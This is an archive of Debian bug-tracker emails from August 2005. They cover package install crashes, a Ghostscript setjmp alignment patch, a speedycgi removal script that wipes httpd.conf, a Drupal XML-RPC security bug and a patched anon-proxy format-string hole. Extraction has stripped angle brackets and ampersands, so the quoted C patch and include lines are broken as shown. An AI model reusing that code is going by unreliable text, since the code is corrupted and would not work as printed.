and subject line Bug#323849: fixed in libterm-readline-gnu-perl 1.15-2
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--
Received: (at submit) by bugs.debian.org; 18 Aug 2005 20:31:29 +
From [EMAIL PROTECTED] Thu Aug 18 13:31:29 2005
Return-path: [EMAIL PROTECTED]
Received: from iron.libaux.ucsf.edu [128.218.15.248] 
by spohr.debian.org with esmtp (Exim 3.36 1 (Debian))
id 1E5r2v-0001ya-00; Thu, 18 Aug 2005 13:31:29 -0700
Received: from ross by iron.libaux.ucsf.edu with local (Exim 4.52)
id 1E5r2R-0006jL-EY; Thu, 18 Aug 2005 13:30:59 -0700
Content-Type: text/plain; charset=us-ascii
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
From: Ross Boylan [EMAIL PROTECTED]
To: Debian Bug Tracking System [EMAIL PROTECTED]
Subject: locales: error on install: double free or corruption
X-Mailer: reportbug 3.15
Date: Thu, 18 Aug 2005 13:30:59 -0700
Message-Id: [EMAIL PROTECTED]
X-SA-Exim-Connect-IP: locally generated
X-SA-Exim-Mail-From: [EMAIL PROTECTED]
X-SA-Exim-Scanned: No (on iron.libaux.ucsf.edu); SAEximRunCond expanded to false
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE 
autolearn=no version=2.60-bugs.debian.org_2005_01_02

Package: locales
Version: 2.3.5-3
Severity: normal

My system is mostly testing, but I upgraded parts to unstable,
including glibc.  During that same upgrade, I got the error:
-
Setting up locales (2.3.5-3) ...
Generating locales (this might take a while)...
  en_US.ISO-8859-1... done
  en_US.UTF-8... done
  eu_ES.ISO-8859-1... done
  [EMAIL PROTECTED] done
  fr_FR.ISO-8859-1... done
  fr_FR.UTF-8... done
  [EMAIL PROTECTED] done
Generation complete.
*** glibc detected *** double free or corruption (!prev): 0x089a79c8 ***
dpkg: error processing locales (--configure):
 subprocess post-installation script killed by signal (Aborted)
--
This followed

--
# apt-get -qt unstable install libgal2.4-common
Reading Package Lists...
Building Dependency Tree...
The following extra packages will be installed:
  dbus-1 dbus-glib-1 libc6 libc6-dbg libc6-dev libc6-prof libgal2.4-0 
libgnomevfs2-0
  libgnomevfs2-common libhal-storage0 libhal0 locales
Recommended packages:
  gamin fam
The following NEW packages will be installed:
  dbus-1 dbus-glib-1 libhal-storage0 libhal0
The following packages will be upgraded:
  libc6 libc6-dbg libc6-dev libc6-prof libgal2.4-0 libgal2.4-common 
libgnomevfs2-0 libgnomevfs2-common
  locales
9 upgraded, 4 newly installed, 0 to remove and 349 not upgraded.
---

I don't know how serious this is, or even if the problem really lies
with locales.

-- System Information:
Debian Release: testing/unstable
  APT prefers testing
  APT policy: (600, 'testing'), (500, 'stable'), (50, 'unstable'), (40, 
'experimental')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.4.27adnvcd
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)

Versions of packages locales depends on:
ii  debconf   1.4.52 Debian configuration management sy
ii  libc6 [glibc-2.3.5-3] 2.3.5-3GNU C Library: Shared libraries an

locales recommends no packages.

-- debconf information:
* locales/default_environment_locale: None
* locales/locales_to_be_generated: en_US ISO-8859-1, en_US.UTF-8 UTF-8, eu_ES 
ISO-8859-1, [EMAIL PROTECTED] ISO-8859-15, fr_FR ISO-8859-1, fr_FR.UTF-8 UTF-8, 
[EMAIL PROTECTED] ISO-8859-15

---
Received: (at 323849-close) by bugs.debian.org; 30 Aug 2005 18:10:51 +
From [EMAIL PROTECTED] Tue Aug 30 11:10:50 2005
Return-path: [EMAIL PROTECTED]
Received: from katie by spohr.debian.org with local (Exim 3.36 1 (Debian))
id 1EAAR2-0008BR-00; Tue, 30 Aug 2005 11:02:12 -0700
From: Gunnar Wolf [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.56 $
Subject: Bug#323849: fixed in libterm-readline-gnu-perl 1.15-2
Message-Id: [EMAIL PROTECTED]
Sender: Archive Administrator [EMAIL PROTECTED]
Date: Tue, 30 Aug 2005 11:02:12 -0700
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 

Bug#304604: marked as done (perl: heap corruption causes installation of other packages to fail (debconf is aborting) with new glibc)

2005-08-30 Thread Debian Bug Tracking System
Your message dated Tue, 30 Aug 2005 11:02:12 -0700
with message-id [EMAIL PROTECTED]
and subject line Bug#323849: fixed in libterm-readline-gnu-perl 1.15-2
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--
Received: (at submit) by bugs.debian.org; 14 Apr 2005 09:19:59 +
From [EMAIL PROTECTED] Thu Apr 14 02:19:58 2005
Return-path: [EMAIL PROTECTED]
Received: from cernmx08.cern.ch (cernmxlb.cern.ch) [137.138.166.172] 
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1DM0VW-00041N-00; Thu, 14 Apr 2005 02:19:30 -0700
DomainKey-Signature: a=rsa-sha1; c=nofws; s=beta; d=cern.ch; q=dns; 

h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding;
 

b=I9PADbigls08lja7Tgbg4AQD7EkHSrpZgGG+So+7Gykwmv55YNbn+BwKyQanX5hr+16ipyktAxrG50AMeU05V/kag4d0CbIrGu7yQbqcl8H+rkLXovana+ofVXdoGYPx;
Keywords: CERN SpamKiller Note: -49 Charset: west-latin
X-Filter: CERNMX08 CERN MX v2.0 050406.1247 Release
Received: from pcitgm11.cern.ch ([137.138.32.83]) by cernmxlb.cern.ch with 
Microsoft SMTPSVC(6.0.3790.211);
 Thu, 14 Apr 2005 11:18:50 +0200
Received: by pcitgm11.cern.ch (Postfix, from userid 1000)
id A3F036F866; Thu, 14 Apr 2005 11:18:50 +0200 (CEST)
Content-Type: text/plain; charset=us-ascii
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
From: Gabor Gombas [EMAIL PROTECTED]
To: Debian Bug Tracking System [EMAIL PROTECTED]
Subject: locales: Upgrading fails
X-Mailer: reportbug 3.9
Date: Thu, 14 Apr 2005 11:18:50 +0200
Message-Id: [EMAIL PROTECTED]
X-OriginalArrivalTime: 14 Apr 2005 09:18:50.0942 (UTC) 
FILETIME=[F8AE75E0:01C540D2]
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE 
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level: 

Package: locales
Version: 2.3.4-3
Severity: important
Tags: experimental


Hi,

Trying to upgrade to 2.3.4-3 gives the following error:

Setting up locales (2.3.4-3) ...
Generating locales...
  en_US.ISO-8859-1... done
  en_US.ISO-8859-15... done
  en_US.UTF-8... done
  hu_HU.ISO-8859-2... done
  hu_HU.UTF-8... done
Generation complete.
*** glibc detected *** double free or corruption (!prev): 0x08781408 ***
dpkg: error processing locales (--configure):
 subprocess post-installation script killed by signal (Aborted)
Errors were encountered while processing:
 locales
E: Sub-process /usr/bin/dpkg returned an error code (1)

-- System Information:
Debian Release: 3.1
  APT prefers unstable
  APT policy: (990, 'unstable'), (101, 'experimental')
Architecture: i386 (i686)
Kernel: Linux 2.6.11
Locale: LANG=en_US.UTF-8, LC_CTYPE=hu_HU.UTF-8 (charmap=UTF-8)

Versions of packages locales depends on:
ii  debconf   1.4.48 Debian configuration management sy
ii  libc6 [glibc-2.3.4-3] 2.3.4-3GNU C Library: Shared libraries an

-- debconf information:
* locales/default_environment_locale: en_US.UTF-8
* locales/locales_to_be_generated: en_US ISO-8859-1, en_US.ISO-8859-15 
ISO-8859-15, en_US.UTF-8 UTF-8, hu_HU ISO-8859-2, hu_HU.UTF-8 UTF-8

---
Received: (at 323849-close) by bugs.debian.org; 30 Aug 2005 18:10:51 +
From [EMAIL PROTECTED] Tue Aug 30 11:10:50 2005
Return-path: [EMAIL PROTECTED]
Received: from katie by spohr.debian.org with local (Exim 3.36 1 (Debian))
id 1EAAR2-0008BR-00; Tue, 30 Aug 2005 11:02:12 -0700
From: Gunnar Wolf [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.56 $
Subject: Bug#323849: fixed in libterm-readline-gnu-perl 1.15-2
Message-Id: [EMAIL PROTECTED]
Sender: Archive Administrator [EMAIL PROTECTED]
Date: Tue, 30 Aug 2005 11:02:12 -0700
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER 
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-CrossAssassin-Score: 3

Source: libterm-readline-gnu-perl
Source-Version: 1.15-2

We believe that the bug you reported is fixed in the latest version of
libterm-readline-gnu-perl, which is due to be installed in the Debian FTP 
archive:

libterm-readline-gnu-perl_1.15-2.diff.gz
  to 
pool/main/libt/libterm-readline-gnu-perl/libterm-readline-gnu-perl_1.15-2.diff.gz

Bug#324796: gs ppc problems - a patch

2005-08-30 Thread Ian Jackson
I have been investigating problems with gs that show up with gs-esp in
Ubuntu.  There turns out to be a bug in gs which causes problems for
gs's memory management system.

For your edification I enclose the patch that I've just uploaded into
Ubuntu Breezy.  I think something like this patch is likely to be
necessary for Debian gs's too.

The top of the patch, below, contains URLs for the references I
found.  The core bug for which my patch is a workaround is recorded in
the gs bugzilla.

I hope you find this mail helpful.  Thank you for your attention.

Ian.

diff -x '*~' -ruN ../orig/gs-esp-7.07.1/debian/changelog 
gs-esp-7.07.1/debian/changelog
--- ../orig/gs-esp-7.07.1/debian/changelog  2005-08-30 18:56:12.0 
+0100
+++ gs-esp-7.07.1/debian/changelog  2005-08-30 18:55:44.0 +0100
@@ -1,3 +1,30 @@
+gs-esp (7.07.1-9ubuntu5) breezy; urgency=low
+
+  * Fix coredumping bug on ppc: Ubuntu bugzilla:
+ http://bugzilla.ubuntu.com/show_bug.cgi?id=13771
+This is the same issue as
+ http://bugs.ghostscript.com/show_bug.cgi?id=687643
+ http://bugs.ghostscript.com/show_bug.cgi?id=687730
+discussed in
+ http://ghostscript.com/pipermail/gs-code-review/2004-September/004649.html
+and probably the same as Debian bug #324796 and perhaps others in
+Debian's gs-esp.
+
+This bug is due to gs's incorrect assumption that (where ref is an
+important struct inside gs) sizeof(ref) % alignof(jmp_buf) == 0.  This
+is not true on ppc and apparently not necessarily on Itanium either.
+
+The `fix' I have applied is to wrap setjmp/longjmp up in macros which
+arrange for jmp_buf to have alignment 1, as sketched out in the URLs
+above.  A previous attempt to fix it by padding ref out to the
+alignment of jmp_buf failed and I don't know why; but I suspect other
+unjustified assumptions in gs.
+
+GhostScript's algorithms ought to be repaired not to assume
+falsehoods.
+
+ -- Ian Jackson [EMAIL PROTECTED]  Tue, 30 Aug 2005 18:55:44 +0100
+
 gs-esp (7.07.1-9ubuntu4) breezy; urgency=low
 
   * Rebuild for new C++ ABI
diff -x '*~' -ruN ../orig/gs-esp-7.07.1/src/genarch.c 
gs-esp-7.07.1/src/genarch.c
--- ../orig/gs-esp-7.07.1/src/genarch.c 2003-08-19 16:32:25.0 +0100
+++ gs-esp-7.07.1/src/genarch.c 2005-08-30 18:46:40.0 +0100
@@ -28,7 +28,8 @@
  */
 #include string.h
 #include time.h
-#include setjmp.h
+
+#include gsfix-setjmp.h
 
 /* We should write the result on stdout, but the original Turbo C 'make' */
 /* can't handle output redirection (sigh). */
diff -x '*~' -ruN ../orig/gs-esp-7.07.1/src/gp_os2.c gs-esp-7.07.1/src/gp_os2.c
--- ../orig/gs-esp-7.07.1/src/gp_os2.c  2003-07-13 05:43:17.0 +0100
+++ gs-esp-7.07.1/src/gp_os2.c  2005-08-30 18:46:40.0 +0100
@@ -72,7 +72,7 @@
 
 #ifdef __DLL__
 /* use longjmp instead of exit when using DLL */
-#include setjmp.h
+#include gsfix-setjmp.h
 extern jmp_buf gsdll_env;
 
 #endif
diff -x '*~' -ruN ../orig/gs-esp-7.07.1/src/gsfix-setjmp.h 
gs-esp-7.07.1/src/gsfix-setjmp.h
--- ../orig/gs-esp-7.07.1/src/gsfix-setjmp.h1970-01-01 01:00:00.0 
+0100
+++ gs-esp-7.07.1/src/gsfix-setjmp.h2005-08-30 18:46:40.0 +0100
@@ -0,0 +1,35 @@
+#ifndef GSFIX_SETJMP_H
+#define GSFIX_SETJMP_H
+
+#include setjmp.h
+
+typedef struct {
+  char c;
+  jmp_buf j;
+} gsfix_jmp_buf_test;
+
+#define gsfix_jmp_buf_align ((size_t)((gsfix_jmp_buf_test*)0)-j)
+
+typedef struct {
+  unsigned char stuff[sizeof(jmp_buf) + gsfix_jmp_buf_align];
+} gsfix_jmp_buf;
+
+#define gsfix_orig_jmp_buf  jmp_buf
+#define gsfix_orig_setjmp(x)setjmp(x)
+#define gsfix_orig_longjmp(x,y) longjmp((x),(y))
+
+#undef jmp_buf
+#undef setjmp
+#undef longjmp
+
+#define jmp_bufgsfix_jmp_buf
+#define setjmp(x)  (gsfix_orig_setjmp(find_jmp_buf((x
+#define longjmp(x,val) (gsfix_orig_longjmp(find_jmp_buf((x)),(val)))
+
+#define find_jmp_buf(gsfjb)\
+  (\
+   ((size_t)(gsfjb).stuff + gsfix_jmp_buf_align)   \
+~(size_t)(gsfix_jmp_buf_align-1)  \
+  )
+
+#endif /*GSFIX_SETJMP_H*/
diff -x '*~' -ruN ../orig/gs-esp-7.07.1/src/sdct.h gs-esp-7.07.1/src/sdct.h
--- ../orig/gs-esp-7.07.1/src/sdct.h2002-04-23 12:58:47.0 +0100
+++ gs-esp-7.07.1/src/sdct.h2005-08-30 18:46:40.0 +0100
@@ -21,7 +21,7 @@
 #ifndef sdct_INCLUDED
 #  define sdct_INCLUDED
 
-#include setjmp.h/* for jmp_buf */
+#include gsfix-setjmp.h  /* for jmp_buf */
 
 /* -- DCT filters -- */
 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#325757: sparc32: catch-22 between kernel-image-2.4 and libc6_2.3.2.ds1-22

2005-08-30 Thread Peter Hanappe

Package: libc6
Version: 2.3.2.ds1-22
Severity: grave

On sparc32/sun4m:

I'm upgrading from kernel 2.2.20 to 2.4.27 using the command:

# apt-get install -f kernel-image-2.4.27-2-sparc32

The kernel package depends on libc6_2.3.2.ds1-22_sparc.
The installation of libc6 fails with the message:

  WARNING: You have a cpu which requires kernel 2.4.21
  or greater in order to install this version of glibc.
  Please upgrade the kernel before installing this package.

kernel 2.4.27 requires libc6_2.3.2 but libc6_2.3.2 requires kernel
2.4.21 or greater. Any solutions?

Thanks
Peter Hanappe



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#320722: marked as done (lookup segfaults at start on amd64)

2005-08-30 Thread Debian Bug Tracking System
Your message dated Tue, 30 Aug 2005 11:47:09 -0700
with message-id [EMAIL PROTECTED]
and subject line Bug#320722: fixed in lookup 1.08b-10
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--
Received: (at submit) by bugs.debian.org; 31 Jul 2005 22:34:01 +
From [EMAIL PROTECTED] Sun Jul 31 15:34:01 2005
Return-path: [EMAIL PROTECTED]
Received: from c9062e1f.virtua.com.br (localhost.localdomain) [201.6.46.31] 
by spohr.debian.org with esmtp (Exim 3.36 1 (Debian))
id 1DzMNa-0008L9-00; Sun, 31 Jul 2005 15:34:01 -0700
Received: from loos by localhost.localdomain with local (Exim 4.50)
id 1DzMNG-0001wV-An
for [EMAIL PROTECTED]; Sun, 31 Jul 2005 19:33:38 -0300
Content-Type: text/plain; charset=us-ascii
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
From: loos [EMAIL PROTECTED]
To: Debian Bug Tracking System [EMAIL PROTECTED]
Subject: lookup segfaults at start on amd64
X-Mailer: reportbug 3.8
Date: Sun, 31 Jul 2005 19:33:38 -0300
Message-Id: [EMAIL PROTECTED]
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE 
autolearn=no version=2.60-bugs.debian.org_2005_01_02

Package: lookup
Version: 1.08b-9
Severity: grave
Justification: renders package unusable

lookup segfaults at start, by consequence the following packages are
uninstallable:
 edict
 kanjidic
 kiten
 kdeedu
 kde-amusements
 kde
 sdic-edict
 xjdic

due to dependency problems


-- System Information:
Debian Release: 3.1
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.8-11-amd64-k8
Locale: LANG=pt_BR.UTF-8, LC_CTYPE=pt_BR.UTF-8 (charmap=UTF-8)

Versions of packages lookup depends on:
ii  libc6   2.3.2.ds1-22 GNU C Library: Shared libraries an

-- no debconf information

---
Received: (at 320722-close) by bugs.debian.org; 30 Aug 2005 18:49:28 +
From [EMAIL PROTECTED] Tue Aug 30 11:49:27 2005
Return-path: [EMAIL PROTECTED]
Received: from katie by spohr.debian.org with local (Exim 3.36 1 (Debian))
id 1EAB8X-0003rL-00; Tue, 30 Aug 2005 11:47:09 -0700
From: Ludovic Drolez [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.56 $
Subject: Bug#320722: fixed in lookup 1.08b-10
Message-Id: [EMAIL PROTECTED]
Sender: Archive Administrator [EMAIL PROTECTED]
Date: Tue, 30 Aug 2005 11:47:09 -0700
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER 
autolearn=no version=2.60-bugs.debian.org_2005_01_02

Source: lookup
Source-Version: 1.08b-10

We believe that the bug you reported is fixed in the latest version of
lookup, which is due to be installed in the Debian FTP archive:

lookup_1.08b-10.diff.gz
  to pool/main/l/lookup/lookup_1.08b-10.diff.gz
lookup_1.08b-10.dsc
  to pool/main/l/lookup/lookup_1.08b-10.dsc
lookup_1.08b-10_i386.deb
  to pool/main/l/lookup/lookup_1.08b-10_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Ludovic Drolez [EMAIL PROTECTED] (supplier of updated lookup package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Fri, 26 Aug 2005 17:49:41 +0200
Source: lookup
Binary: lookup
Architecture: source i386
Version: 1.08b-10
Distribution: unstable
Urgency: low
Maintainer: Ludovic Drolez [EMAIL PROTECTED]
Changed-By: Ludovic Drolez [EMAIL PROTECTED]
Description: 
 lookup - interactive utility to search text files quickly
Closes: 320722
Changes: 
 lookup (1.08b-10) unstable; urgency=low
 .
   * Fixed a segfault on amd64 thanks to Luc Saillard. Closes: #320722
Files: 
 9c71b7b274df88dc2a5ea07c04a691c8 573 text optional lookup_1.08b-10.dsc
 5ad40d164422f57534df6d3aff8cf39c 7238 text optional lookup_1.08b-10.diff.gz
 6dc05c750d93229a84b3cd304fd992f5 109706 text optional lookup_1.08b-10_i386.deb


Bug#325763: libapache-mod-speedycgi: deletes httpd.conf on removal

2005-08-30 Thread Niko Tyni
Package: libapache-mod-speedycgi
Version: 2.22-1
Severity: grave
Justification: causes non-serious data loss

Hi,

removing libapache-mod-speedycgi leaves /etc/apache/httpd.conf
zero-sized. This happens because the postrm script tries to comment
out references to the module like this:

cat /etc/apache$1/httpd.conf |\
 sed 's/^(LoadModule.*mod_speedycgi\.so)/#\1/'  $tmpfile || true
mv -f $tmpfile /etc/apache$1/httpd.conf

but the correct sed grouping markers are '\(' and '\)' instead of '(' and ')'.
Then sed bails out:

sed: -e expression #1, char 39: invalid reference \1 on `s' command's RHS

and $tmpfile ends up empty.

(Furthermore, at least on my system the LoadModule line is in
/etc/apache/modules.conf, not httpd.conf, so the commenting out
wouldn't apparently work anyway.)

Transcript follows:

# ls -l /etc/apache/httpd.conf 
-rw-r--r--  1 root root 35462 2005-08-30 22:17 /etc/apache/httpd.conf
# dpkg -r libapache-mod-speedycgi
(Reading database ... 165864 files and directories currently installed.)
Removing libapache-mod-speedycgi ...
sed: -e expression #1, char 39: invalid reference \1 on `s' command's RHS
An Apache module has been modified.  Restart apache [Y/n]? 
/usr/sbin/apachectl graceful: httpd gracefully restarted
# ls -l /etc/apache/httpd.conf 
-rw-r--r--  1 root root 0 2005-08-30 22:18 /etc/apache/httpd.conf


-- System Information:
Debian Release: 3.1
Architecture: i386 (i686)
Kernel: Linux 2.6.8-2-k7
Locale: LANG=en_US, [EMAIL PROTECTED] (charmap=ISO-8859-15)

Versions of packages libapache-mod-speedycgi depends on:
ii  apache-common   1.3.33-6 support files for all Apache webse
ii  libc6   2.3.2.ds1-22 GNU C Library: Shared libraries an
ii  libdb4.14.1.25-18Berkeley v4.1 Database Libraries [
ii  libexpat1   1.95.8-3 XML parsing C library - runtime li
ii  speedy-cgi-perl 2.22-1   speed up perl scripts by making th

-- no debconf information


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#325757: sparc32: catch-22 between kernel-image-2.4 and libc6_2.3.2.ds1-22

2005-08-30 Thread Thiemo Seufer
Peter Hanappe wrote:
 Package: libc6
 Version: 2.3.2.ds1-22
 Severity: grave
 
 On sparc32/sun4m:
 
 I'm upgrading from kernel 2.2.20 to 2.4.27 using the command:
 
 # apt-get install -f kernel-image-2.4.27-2-sparc32
 
 The kernel package depends on libc6_2.3.2.ds1-22_sparc.
 The installation of libc6 fails with the message:
 
   WARNING: You have a cpu which requires kernel 2.4.21
   or greater in order to install this version of glibc.
   Please upgrade the kernel before installing this package.
 
 kernel 2.4.27 requires libc6_2.3.2 but libc6_2.3.2 requires kernel
 2.4.21 or greater. Any solutions?

Read the release notes (http://www.debian.org/releases/sarge/releasenotes)
and follow the upgrade instructions.


Thiemo


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#323347: Another XMLRPC issue in drupal

2005-08-30 Thread Steve Langasek
On Tue, Aug 30, 2005 at 01:44:33PM +0200, Moritz Muehlenhoff wrote:
 Moritz Muehlenhoff wrote:
  Package: drupal
  Severity: grave
  Tags: security
  Justification: user security hole

  [I'm pretty sure you are already aware of it; but here it is anyway]

  Another XMLRPC vulnerability has been detected that affects Drupal
  as well. Please see http://www.hardened-php.net/advisory_142005.66.html
  for information about the issue in general. 

  The new upstream release 4.5.4 resolves this issue.

 drupal's transition into testing doesn't take place, because the changelog
 of the fixed package didn't contain bug closers and the two RC security bugs
 prevent migration.
 So, please, either close them manually or with the next upload.

If the bugs are fixed in the current version then they should be closed
*now*, not waiting until the next upload.

Thanks,
-- 
Steve Langasek   Give me a lever long enough and a Free OS
Debian Developer   to set it on, and I can move the world.
[EMAIL PROTECTED]   http://www.debian.org/


signature.asc
Description: Digital signature


Bug#313324: not fixed in 1.2-3

2005-08-30 Thread Sven Luther
On Tue, Aug 30, 2005 at 12:51:46PM -0700, Steve Langasek wrote:
 On Tue, Aug 30, 2005 at 08:16:49PM +0200, Sven Luther wrote:
 
  Indeed, i am waiting for the glibc/g++/whatever transition to finish to be
  able to check this, since last i tried a couple of libraries had not been
  rebuilt. The package was removed from testing until then.
 
 I've NMUed all of these libraries, it should be possible now to rebuild
 hardware-monitor.

Ok, will retry a build.

Friendly,

Sven Luther



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#313324: not fixed in 1.2-3

2005-08-30 Thread Steve Langasek
On Tue, Aug 30, 2005 at 08:16:49PM +0200, Sven Luther wrote:

 Indeed, i am waiting for the glibc/g++/whatever transition to finish to be
 able to check this, since last i tried a couple of libraries had not been
 rebuilt. The package was removed from testing until then.

I've NMUed all of these libraries, it should be possible now to rebuild
hardware-monitor.

-- 
Steve Langasek   Give me a lever long enough and a Free OS
Debian Developer   to set it on, and I can move the world.
[EMAIL PROTECTED]   http://www.debian.org/


signature.asc
Description: Digital signature


Bug#325769: Format string security hole in anon-proxy

2005-08-30 Thread Steve Kemp

Package: anon-proxy
Version: 00.02.39-7
Severity: serious
Tags: patch, upstream


  The logging code in anon-proxy contains a misuse of the syslog function
 allowing potential remote compromise of the host it is running upon.

  (This depends whether logging is enabled).

  The patch below fixes the issue.

Steve
-- 
# The Debian Security Audit Project.
http://www.debian.org/security/audit

--- CAMsg.cpp-orig  2005-08-29 21:17:42.0 +0100
+++ CAMsg.cpp   2005-08-29 21:18:30.0 +0100
@@ -124,7 +124,7 @@
{
case MSG_LOG:
#ifndef _WIN32
-   
syslog(type,oMsg.m_strMsgBuff);
+   
syslog(type,%s,oMsg.m_strMsgBuff);
#endif
break;
case MSG_FILE:
[EMAIL PROTECTED]:/tmp/anon-proxy-00.02.39$ 



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: bug 317493

2005-08-30 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 tag 317493 moreinfo
Bug#317493: liquidwar: makes awful noise on start and crashes on exit
There were no tags set.
Tags added: moreinfo

 Thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#323347: [drupal-devel] Bug#323347: Another XMLRPC issue in drupal

2005-08-30 Thread Karoly Negyesi

 The new upstream release 4.5.4 resolves this issue.


If the bugs are fixed in the current version then they should be closed
*now*, not waiting until the next upload.


Version 4.5.5 (and 4.6.3) does not have an XML-RPC security hole to our  
best knowledge.


Karoly Negyesi
Drupal security team member
Drupal XML-RPC maintainer


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#323347: marked as done (Another XMLRPC issue in drupal)

2005-08-30 Thread Debian Bug Tracking System
Your message dated Tue, 30 Aug 2005 13:32:06 -0700
with message-id [EMAIL PROTECTED]
and subject line [drupal-devel] Bug#323347: Another XMLRPC issue in drupal
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--
Received: (at submit) by bugs.debian.org; 16 Aug 2005 07:45:40 +
From [EMAIL PROTECTED] Tue Aug 16 00:45:40 2005
Return-path: [EMAIL PROTECTED]
Received: from (vserver151.vserver151.serverflex.de) [193.22.164.111] 
by spohr.debian.org with esmtp (Exim 3.36 1 (Debian))
id 1E4w8i-0006YE-00; Tue, 16 Aug 2005 00:45:40 -0700
Received: from wlan-client-006.informatik.uni-bremen.de ([134.102.116.7] 
helo=localhost.localdomain)
by vserver151.vserver151.serverflex.de with esmtpsa 
(TLS-1.0:RSA_AES_256_CBC_SHA:32)
(Exim 4.50)
id 1E4w8d-0003On-Fy
for [EMAIL PROTECTED]; Tue, 16 Aug 2005 09:45:35 +0200
Received: from jmm by localhost.localdomain with local (Exim 4.52)
id 1E4w91-0001RT-E0; Tue, 16 Aug 2005 09:45:59 +0200
Content-Type: text/plain; charset=us-ascii
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
From: Moritz Muehlenhoff [EMAIL PROTECTED]
To: Debian Bug Tracking System [EMAIL PROTECTED]
Subject: Another XMLRPC issue in drupal
X-Mailer: reportbug 3.15
Date: Tue, 16 Aug 2005 09:45:59 +0200
Message-Id: [EMAIL PROTECTED]
X-SA-Exim-Connect-IP: 134.102.116.7
X-SA-Exim-Mail-From: [EMAIL PROTECTED]
X-SA-Exim-Scanned: No (on vserver151.vserver151.serverflex.de); SAEximRunCond 
expanded to false
